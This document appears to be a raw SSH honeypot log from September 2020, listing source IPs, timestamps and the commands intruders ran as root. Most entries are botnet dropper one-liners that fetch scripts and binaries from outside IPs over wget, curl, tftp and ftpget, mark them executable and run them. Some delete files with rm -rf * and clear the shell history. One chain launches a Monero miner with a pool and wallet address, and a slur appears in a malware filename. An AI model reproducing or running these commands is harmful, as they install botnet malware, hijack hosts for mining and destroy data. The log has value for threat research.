Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.112/pipe.sh; curl -O http://194.180.224.112/pipe.sh; chmod 777 pipe.sh; sh pipe.sh; tftp 194.180.224.112 -c get pipe.sh; chmod 777 pipe.sh; sh pipe.sh; tftp -r pipe2.sh -g 194.180.224.112; chmod 777 pipe2.sh; sh pipe2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.112 pipe1.sh pipe1.sh; sh pipe1.sh; rm -rf pipe.sh pipe.sh pipe2.sh pipe1.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.180.224.112/pipe.sh
curl -O http://194.180.224.112/pipe.sh
chmod 777 pipe.sh
sh pipe.sh
tftp 194.180.224.112 -c get pipe.sh
chmod 777 pipe.sh
sh pipe.sh
tftp -r pipe2.sh -g 194.180.224.112
chmod 777 pipe2.sh
sh pipe2.sh
ftpget -v -u anonymous -p anonymous -P 21 194.180.224.112 pipe1.sh pipe1.sh
sh pipe1.sh
rm -rf pipe.sh pipe.sh pipe2.sh pipe1.sh
rm -rf *
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 194.180.224.115 20-Sep-2020 22:29:27 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.112/pipe.sh; curl -O http://194.180.224.112/pipe.sh; chmod 777 pipe.sh; sh pipe.sh; tftp 194.180.224.112 -c get pipe.sh; chmod 777 pipe.sh; sh pipe.sh; tftp -r pipe2.sh -g 194.180.224.112; chmod 777 pipe2.sh; sh pipe2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.112 pipe1.sh pipe1.sh; sh pipe1.sh; rm -rf pipe.sh pipe.sh pipe2.sh pipe1.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.180.224.112/pipe.sh
curl -O http://194.180.224.112/pipe.sh
chmod 777 pipe.sh
sh pipe.sh
tftp 194.180.224.112 -c get pipe.sh
chmod 777 pipe.sh
sh pipe.sh
tftp -r pipe2.sh -g 194.180.224.112
chmod 777 pipe2.sh
sh pipe2.sh
ftpget -v -u anonymous -p anonymous -P 21 194.180.224.112 pipe1.sh pipe1.sh
sh pipe1.sh
rm -rf pipe.sh pipe.sh pipe2.sh pipe1.sh
rm -rf *

From 151.80.34.123 21-Sep-2020 04:47:28 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 185.239.242.92/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 rm -rf nigga* ; curl -O wget 185.239.242.92/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 ; rm -rf nigga* ; wget 178.255.101.213/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 178.255.101.213/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ;wget nasapaul.com/cnrig ; chmod 777 cnrig ; ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 45P2hmaiEzFcw2ZDGCAUko1Q13AAA8f6PMkvsqC3sSWzDxoSF5DRDFTVH5RJosNiggCri7k4CqyhZBbHoHaqExe62p62qxE -p rut -k --tls -B
cat /etc/issue
cd /tmp
wget 185.239.242.92/nigga.x86
chmod 777 nigga.x86
./nigga.x86 autorooter.x86 rm -rf nigga*
curl -O wget 185.239.242.92/nigga.x86
chmod 777 nigga.x86
./nigga.x86 autorooter.x86
rm -rf nigga*
wget 178.255.101.213/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
curl -O 178.255.101.213/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
wget nasapaul.com/cnrig
chmod 777 cnrig
./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 45P2hmaiEzFcw2ZDGCAUko1Q13AAA8f6PMkvsqC3sSWzDxoSF5DRDFTVH5RJosNiggCri7k4CqyhZBbHoHaqExe62p62qxE -p rut -k --tls -B

From 194.180.224.103 21-Sep-2020 06:06:43 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.49.224.207/pipe.sh; curl -O http://37.49.224.207/pipe.sh; chmod 777 pipe.sh; sh pipe.sh; rm -rf pipe.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://37.49.224.207/pipe.sh
curl -O http://37.49.224.207/pipe.sh
chmod 777 pipe.sh
sh pipe.sh
rm -rf pipe.sh
rm -rf *

From 134.122.124.220 21-Sep-2020 07:01:41 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://207.154.200.148/Percocetbins.sh; chmod 777 Percocetbins.sh; sh Percocetbins.sh; tftp 207.154.200.148 -c get Percocettftp1.sh; chmod 777 Percocettftp1.sh; sh Percocettftp1.sh; tftp -r Percocettftp2.sh -g 207.154.200.148; chmod 777 Percocettftp2.sh; sh Percocettftp2.sh; rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://207.154.200.148/Percocetbins.sh
chmod 777 Percocetbins.sh
sh Percocetbins.sh
tftp 207.154.200.148 -c get Percocettftp1.sh
chmod 777 Percocettftp1.sh
sh Percocettftp1.sh
tftp -r Percocettftp2.sh -g 207.154.200.148
chmod 777 Percocettftp2.sh
sh Percocettftp2.sh
rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh
rm -rf *

From 193.228.91.109 21-Sep-2020 10:37:29 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.145.185.94/Otpzl/7rtya.x86; curl -O http://45.145.185.94/Otpzl/7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 Exploit.x86; rm -rf 7rtya.x86.x86; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.145.185.94/Otpzl/7rtya.x86
curl -O http://45.145.185.94/Otpzl/7rtya.x86
chmod +x 7rtya.x86
./7rtya.x86 Exploit.x86
rm -rf 7rtya.x86.x86
history -c

From 194.180.224.115 21-Sep-2020 14:19:04 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://37.49.224.207/pipe.sh; curl -O http://37.49.224.207/pipe.sh; chmod 777 pipe.sh; sh pipe.sh; tftp 37.49.224.207 -c get pipe.sh; chmod 777 pipe.sh; sh pipe.sh; tftp -r pipe2.sh -g 37.49.224.207; chmod 777 pipe2.sh; sh pipe2.sh; ftpget -v -u anonymous -p anonymous -P 21 37.49.224.207 pipe1.sh pipe1.sh; sh pipe1.sh; rm -rf pipe.sh pipe.sh pipe2.sh pipe1.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://37.49.224.207/pipe.sh
curl -O http://37.49.224.207/pipe.sh
chmod 777 pipe.sh
sh pipe.sh
tftp 37.49.224.207 -c get pipe.sh
chmod 777 pipe.sh
sh pipe.sh
tftp -r pipe2.sh -g 37.49.224.207
chmod 777 pipe2.sh
sh pipe2.sh
ftpget -v -u anonymous -p anonymous -P 21 37.49.224.207 pipe1.sh pipe1.sh
sh pipe1.sh
rm -rf pipe.sh pipe.sh pipe2.sh pipe1.sh
rm -rf *

From 134.122.124.220 21-Sep-2020 17:22:52 ssh2 root
Exec wget http://164.90.154.53/bins/Formula.x86; chmod 777 Formula.x86; ./Formula.x86
wget http://164.90.154.53/bins/Formula.x86
chmod 777 Formula.x86
./Formula.x86

From 82.205.17.172 21-Sep-2020 20:23:09 ssh2 root
ls
nproc
ls
ls
ls

From 82.205.17.172 21-Sep-2020 20:26:56 ssh2 root
perl test1.pl
cd test1.pl
ls
perl network.pl
cd network.pl
ld
ls
cd

From 103.136.251.145 22-Sep-2020 10:03:12 ssh2 root
Exec uname -m
uname -m

From 34.87.244.114 22-Sep-2020 12:03:28 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 185.239.242.92/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 rm -rf nigga* ; curl -O wget 185.239.242.92/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 ; rm -rf nigga* ; wget 178.255.101.213/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 178.255.101.213/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; wget nasapaul.com/cnrig ; chmod 777 cnrig ; /cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 45P2hmaiEzFcw2ZDGCAUko1Q13AAA8f6PMkvsqC3sSWzDxoSF5DRDFTVH5RJosNiggCri7k4CqyhZBbHoHaqExe62p62qxE -p rut -k --tls -B
cat /etc/issue
cd /tmp
wget 185.239.242.92/nigga.x86
chmod 777 nigga.x86
./nigga.x86 autorooter.x86 rm -rf nigga*
curl -O wget 185.239.242.92/nigga.x86
chmod 777 nigga.x86
./nigga.x86 autorooter.x86
rm -rf nigga*
wget 178.255.101.213/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
curl -O 178.255.101.213/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
wget nasapaul.com/cnrig
chmod 777 cnrig
/cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 45P2hmaiEzFcw2ZDGCAUko1Q13AAA8f6PMkvsqC3sSWzDxoSF5DRDFTVH5RJosNiggCri7k4CqyhZBbHoHaqExe62p62qxE -p rut -k --tls -B

From 82.205.7.139 22-Sep-2020 13:09:17 ssh2 root
yum install -y python3
yum update -y
yum install -y python3
install -y python3
curl -O https://www.python.org/ftp/python/3.8.1/Python-3.8.1.tgz
wget http://www.python.org/ftp/python/2.7.3/Python-2.7.3.tgz

From 45.148.10.65 22-Sep-2020 14:35:21 ssh2 root
Exec cd /tmp; wget http://172.245.205.137/x86_64; chmod 777 *; ./x86_64 roots; echo done wget; busybox wget http://172.245.205.137/x86_64; chmod 777 *; ./x86_64 roots; curl -O http://172.245.205.137/x86_64; chmod 777 *; ./x86_64 roots; echo molov13371@tg; nc 1 1;
cd /tmp
wget http://172.245.205.137/x86_64
chmod 777 *
./x86_64 roots
echo done wget
busybox wget http://172.245.205.137/x86_64
chmod 777 *
./x86_64 roots
curl -O http://172.245.205.137/x86_64
chmod 777 *
./x86_64 roots
echo molov13371@tg
nc 1 1

From 94.54.197.172 22-Sep-2020 17:08:32 ssh2 root
ls
nproc
yum
sudo

From 94.54.197.172 22-Sep-2020 17:11:11 ssh2 root
egrep -i '^flags.*(vmx|svm)' /proc/cpuinfo | wc -l
hostnamectl | egrep "Operating System" | cut -f2 -d":" | cut -f2 -d " "
hostnamectl | grep "Operating System" | cut -f2 -d":" | cut -f2 -d " "
sudo apt-get install vim curl genisoimage -y

From 94.54.197.172 22-Sep-2020 17:12:57 ssh2 root
dnf install snapd
ln -s /var/lib/snapd/snap /snap
python -v

From 94.54.197.172 22-Sep-2020 17:13:46 ssh2 root
ls
ipcalc.pl
cat ipcalc.pl
cat test.pl
cat test1.pl
cat reglas.pl
nano

From 94.54.197.172 22-Sep-2020 17:15:17 ssh2 root
vi
?
helpe
help
su
s
s ~
?
helpe

From 94.54.197.172 22-Sep-2020 17:16:04 ssh2 root
cat /etc/asterisk/users.conf
cd /etc/
ls
ls
cpan
perl reglas.pl
chmod *

From 94.54.197.172 22-Sep-2020 17:17:34 ssh2 root
Mail
cd Mail
ls

From 35.221.230.220 22-Sep-2020 17:19:06 ssh2 root
Exec /ip cloud print
/ip cloud print
perl ipcalc.pl
./ipcalc.pl

From 45.14.224.250 23-Sep-2020 11:57:09 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://45.14.224.118/Percocetbins.sh; chmod 777 Percocetbins.sh; sh Percocetbins.sh; tftp 45.14.224.118 -c get Percocettftp1.sh; chmod 777 Percocettftp1.sh; sh Percocettftp1.sh; tftp -r Percocettftp2.sh -g 45.14.224.118; chmod 777 Percocettftp2.sh; sh Percocettftp2.sh; rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://45.14.224.118/Percocetbins.sh
chmod 777 Percocetbins.sh
sh Percocetbins.sh
tftp 45.14.224.118 -c get Percocettftp1.sh
chmod 777 Percocettftp1.sh
sh Percocettftp1.sh
tftp -r Percocettftp2.sh -g 45.14.224.118
chmod 777 Percocettftp2.sh
sh Percocettftp2.sh
rm -rf Percocetbins.sh Percocettftp1.sh Percocettftp2.sh
rm -rf *

From 172.245.7.189 23-Sep-2020 16:37:29 ssh2 root
Exec wget http://107.175.87.103/bins/Astra.x86; chmod 777 Astra.x86; ./Astra.x86 Servers; rm -rf Astra.* ; history -c
wget http://107.175.87.103/bins/Astra.x86
chmod 777 Astra.x86
./Astra.x86 Servers
rm -rf Astra.*
history -c

From 172.252.180.10 23-Sep-2020 18:17:51 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 185.239.242.92/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 rm -rf nigga* ; curl -O wget 185.239.242.92/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 ; rm -rf nigga* ; wget 178.255.101.213/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 178.255.101.213/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; wget nasapaul.com/cnrig ; chmod 777 cnrig ; ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 45P2hmaiEzFcw2ZDGCAUko1Q13AAA8f6PMkvsqC3sSWzDxoSF5DRDFTVH5RJosNiggCri7k4CqyhZBbHoHaqExe62p62qxE -p rut -k --tls -B
cat /etc/issue
cd /tmp
wget 185.239.242.92/nigga.x86
chmod 777 nigga.x86
./nigga.x86 autorooter.x86 rm -rf nigga*
curl -O wget 185.239.242.92/nigga.x86
chmod 777 nigga.x86
./nigga.x86 autorooter.x86
rm -rf nigga*
wget 178.255.101.213/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
curl -O 178.255.101.213/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
wget nasapaul.com/cnrig
chmod 777 cnrig
./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 45P2hmaiEzFcw2ZDGCAUko1Q13AAA8f6PMkvsqC3sSWzDxoSF5DRDFTVH5RJosNiggCri7k4CqyhZBbHoHaqExe62p62qxE -p rut -k --tls -B

From 104.131.88.115 23-Sep-2020 20:50:23 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.150/bins.sh; chmod +x bins.sh; sh bins.sh; tftp 194.15.36.150 -c get tftp1.sh; chmod +x tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 194.15.36.150; chmod +x tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.15.36.150 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.15.36.150/bins.sh
chmod +x bins.sh
sh bins.sh
tftp 194.15.36.150 -c get tftp1.sh
chmod +x tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 194.15.36.150
chmod +x tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 194.15.36.150 ftp1.sh ftp1.sh
sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh

From 185.6.17.196 23-Sep-2020 23:36:34 ssh2 root
hostnamectl | egrep "Operating System" | cut -f2 -d":" | cut -f2 -d " "hostnamectl | egrep "Operating System" | cut -f2 -d":" | cut -f2 -d " "
hostnamectl | egrep "Operating System" | cut -f2 -d":" | cut -f2 -d " "

From 104.131.11.149 23-Sep-2020 23:36:51 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://194.15.36.150/bins.sh; cat bins.sh > s0354f; chmod +x s0354f; ./s0354f; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://194.15.36.150/bins.sh
cat bins.sh > s0354f
chmod +x s0354f
./s0354f
history -c
ls

From 207.154.242.83 24-Sep-2020 00:48:29 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.150/bins.sh; chmod +x bins.sh; sh bins.sh; tftp 194.15.36.150 -c get tftp1.sh; chmod +x tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 194.15.36.150; chmod +x tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.15.36.150 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.15.36.150/bins.sh
chmod +x bins.sh
sh bins.sh
tftp 194.15.36.150 -c get tftp1.sh
chmod +x tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 194.15.36.150
chmod +x tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 194.15.36.150 ftp1.sh ftp1.sh
sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh

From 161.35.160.121 24-Sep-2020 02:44:15 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://192.210.239.115/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 192.210.239.115 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 192.210.239.115; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://192.210.239.115/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 192.210.239.115 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 192.210.239.115
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *

From 146.255.74.22 24-Sep-2020 22:37:27 ssh2 root
w
cd /home
ls
nproc
ifconfgi
ifconfig
ls -a

From 211.198.205.57 24-Sep-2020 22:40:21 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
cd .ssh
ls

From 211.198.205.57 24-Sep-2020 22:40:40 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
cd
ls

From 141.98.81.154 24-Sep-2020 22:43:31 ssh2 root
curl -s https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py | python -

From 45.148.10.65 24-Sep-2020 22:54:36 ssh2 root
Exec nc 1 1; cd /tmp; wget http://172.245.205.137/x86_64; chmod 777 *; ./x86_64 roots; echo done wget; busybox wget http://172.245.205.137/x86_64; chmod 777 *; ./x86_64 roots; curl -O http://172.245.205.137/x86_64; chmod 777 *; ./x86_64 roots; echo molov13371@tg; nc 1 1;
nc 1 1
cd /tmp
wget http://172.245.205.137/x86_64
chmod 777 *
./x86_64 roots
echo done wget
busybox wget http://172.245.205.137/x86_64
chmod 777 *
./x86_64 roots
curl -O http://172.245.205.137/x86_64
chmod 777 *
./x86_64 roots
echo molov13371@tg
nc 1 1

From 167.172.59.143 24-Sep-2020 23:39:39 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
curl -s https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py | python -
yum install python
apt-get install python
apt-get install python install python pythonvel/speedtest-cli/master/speedtest.py install python install python pythonvel/speedtest-cli/master/speedtest.py python install python pythonvel/speedtest-cli/master/speedtest.py install python install python pythonvel/speedtest-cli/master/speedtest.py install python install python pythonvel/speedtest-cli/master/speedtest.py python install python pythonvel/speedtest-cli/master/speedtest.py python install
curl -s https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py | python -
apt-get install curl
curl -s https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py | python -
history -c

From 211.198.205.57 24-Sep-2020 23:43:21 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
apt-get istall yum

From 211.198.205.57 24-Sep-2020 23:43:35 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
apt-get install yum
ls
w
history 0c
history -c

From 193.228.91.11 26-Sep-2020 06:14:38 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.145.185.94/uDvrLib.sh; curl -O http://45.145.185.94/uDvrLib.sh; chmod 777 uDvrLib.sh; sh uDvrLib.sh; tftp 45.145.185.94 -c get v14tftp.sh; chmod 777 v14tftp.sh; sh v14tftp.sh; tftp -r v13tftp.sh -g 45.145.185.94; chmod 777 v13tftp.sh; sh v13tftp.sh; rm -rf uDvrLib.sh v14tftp.sh v13tftp.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.145.185.94/uDvrLib.sh
curl -O http://45.145.185.94/uDvrLib.sh
chmod 777 uDvrLib.sh
sh uDvrLib.sh
tftp 45.145.185.94 -c get v14tftp.sh
chmod 777 v14tftp.sh
sh v14tftp.sh
tftp -r v13tftp.sh -g 45.145.185.94
chmod 777 v13tftp.sh
sh v13tftp.sh
rm -rf uDvrLib.sh v14tftp.sh v13tftp.sh
rm -rf *

From 206.189.124.27 27-Sep-2020 04:48:35 ssh2 root
Exec cd /var/run || cd /mnt || cd /root || cd /; wget http://192.210.239.115/pXdN91.sh; chmod 777 pXdN91.sh; sh pXdN91.sh; tftp 192.210.239.115 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.210.239.115; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /var/run || cd /mnt || cd /root || cd /
wget http://192.210.239.115/pXdN91.sh
chmod 777 pXdN91.sh
sh pXdN91.sh
tftp 192.210.239.115 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 192.210.239.115
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 13.92.134.70 27-Sep-2020 04:50:47 ssh2 root
Exec echo $UID
echo $UID

From 104.248.235.138 27-Sep-2020 08:12:08 ssh2 root
Exec ccat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://194.15.36.34/dayum0x1a5sfd15as1fa.sh; cat dayum0x1a5sfd15as1fa.sh > josdf99exx0; chmod +x josdf99exx0; ./josdf99exx0; history -c
ccat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://194.15.36.34/dayum0x1a5sfd15as1fa.sh
cat dayum0x1a5sfd15as1fa.sh > josdf99exx0
chmod +x josdf99exx0
./josdf99exx0
history -c

From 194.180.224.103 27-Sep-2020 13:23:46 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.97/pipe.sh; curl -O http://194.180.224.97/pipe.sh; chmod 777 pipe.sh; sh pipe.sh; tftp 194.180.224.97 -c get pipe.sh; chmod 777 pipe.sh; sh pipe.sh; tftp -r pipe2.sh -g 194.180.224.97; chmod 777 pipe2.sh; sh pipe2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.97 pipe1.sh pipe1.sh; sh pipe1.sh; rm -rf pipe.sh pipe.sh pipe2.sh pipe1.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://194.180.224.97/pipe.sh
curl -O http://194.180.224.97/pipe.sh
chmod 777 pipe.sh
sh pipe.sh
tftp 194.180.224.97 -c get pipe.sh
chmod 777 pipe.sh
sh pipe.sh
tftp -r pipe2.sh -g 194.180.224.97
chmod 777 pipe2.sh
sh pipe2.sh
ftpget -v -u anonymous -p anonymous -P 21 194.180.224.97 pipe1.sh pipe1.sh
sh pipe1.sh
rm -rf pipe.sh pipe.sh pipe2.sh pipe1.sh
rm -rf *

From 64.225.11.61 28-Sep-2020 13:59:00 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://194.15.36.150/bins.sh; cat bins.sh > s0354f; chmod +x s0354f; ./s0354f; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://194.15.36.150/bins.sh
cat bins.sh > s0354f
chmod +x s0354f
./s0354f
history -c

From 165.246.41.42 29-Sep-2020 00:18:27 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 193.239.147.156/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 rm -rf nigga* ; curl -O wget 193.239.147.156/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 ; rm -rf nigga* ; wget 193.239.147.156/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 193.239.147.156/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c
cat /etc/issue
cd /tmp
wget 193.239.147.156/nigga.x86
chmod 777 nigga.x86
./nigga.x86 autorooter.x86 rm -rf nigga*
curl -O wget 193.239.147.156/nigga.x86
chmod 777 nigga.x86
./nigga.x86 autorooter.x86
rm -rf nigga*
wget 193.239.147.156/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
curl -O 193.239.147.156/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
Exec cat /etc/issue ; cd /tmp ; wget 193.239.147.156/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 rm -rf nigga* ; curl -O wget 193.239.147.156/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 ; rm -rf nigga* ; wget 193.239.147.156/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 193.239.147.156/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c
cat /etc/issue
cd /tmp
wget 193.239.147.156/nigga.x86
chmod 777 nigga.x86
./nigga.x86 autorooter.x86 rm -rf nigga*
curl -O wget 193.239.147.156/nigga.x86
chmod 777 nigga.x86
./nigga.x86 autorooter.x86
rm -rf nigga*
wget 193.239.147.156/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
curl -O 193.239.147.156/bot.pl
perl bot.pl
rm -rf bot.pl
history -c

From 165.246.41.42 29-Sep-2020 00:33:19 ssh2 root
Exec cat /etc/issue ; cd /tmp ; wget 193.239.147.156/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 rm -rf nigga* ; curl -O wget 193.239.147.156/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 autorooter.x86 ; rm -rf nigga* ; wget 193.239.147.156/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 193.239.147.156/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c
cat /etc/issue
cd /tmp
wget 193.239.147.156/nigga.x86
chmod 777 nigga.x86
./nigga.x86 autorooter.x86 rm -rf nigga*
curl -O wget 193.239.147.156/nigga.x86
chmod 777 nigga.x86
./nigga.x86 autorooter.x86
rm -rf nigga*
wget 193.239.147.156/bot.pl
perl bot.pl
rm -rf bot.pl
history -c
curl -O 193.239.147.156/bot.pl
perl bot.pl
rm -rf bot.pl
history -c

From 167.99.93.124 29-Sep-2020 01:02:23 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://172.245.156.101/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 172.245.156.101 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 172.245.156.101; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://172.245.156.101/yoyobins.sh
chmod 777 yoyobins.sh
sh yoyobins.sh
tftp 172.245.156.101 -c get yoyotftp1.sh
chmod 777 yoyotftp1.sh
sh yoyotftp1.sh
tftp -r yoyotftp2.sh -g 172.245.156.101
chmod 777 yoyotftp2.sh
sh yoyotftp2.sh
rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh
rm -rf *

From 139.59.11.66 30-Sep-2020 01:12:25 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://scan.kreatr00t3d.site/xZTYFDBXVSDVS456/HashtagFreeInternet.x86; cat HashtagFreeInternet.x86 > as0f5wq1dv0sw514qwd; chmod +x as0f5wq1dv0sw514qwd; ./as0f5wq1dv0sw514qwd Rooted.VPS; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://scan.kreatr00t3d.site/xZTYFDBXVSDVS456/HashtagFreeInternet.x86
cat HashtagFreeInternet.x86 > as0f5wq1dv0sw514qwd
chmod +x as0f5wq1dv0sw514qwd
./as0f5wq1dv0sw514qwd Rooted.VPS
history -c

From 2.57.122.186 30-Sep-2020 03:07:31 ssh2 root
Exec nc 1 1;cat /etc/issue; cd /tmp; wget http://172.245.205.137/x86_64; chmod 777 *; ./x86_64 roots; echo done wget; busybox wget http://172.245.205.137/x86_64; chmod 777 *; ./x86_64 roots; curl -O http://172.245.205.137/x86_64; chmod 777 *; ./x86_64 roots; echo molov13371@tg; nc 1 1;
nc 1 1
cat /etc/issue
cd /tmp
wget http://172.245.205.137/x86_64
chmod 777 *
./x86_64 roots
echo done wget
busybox wget http://172.245.205.137/x86_64
chmod 777 *
./x86_64 roots
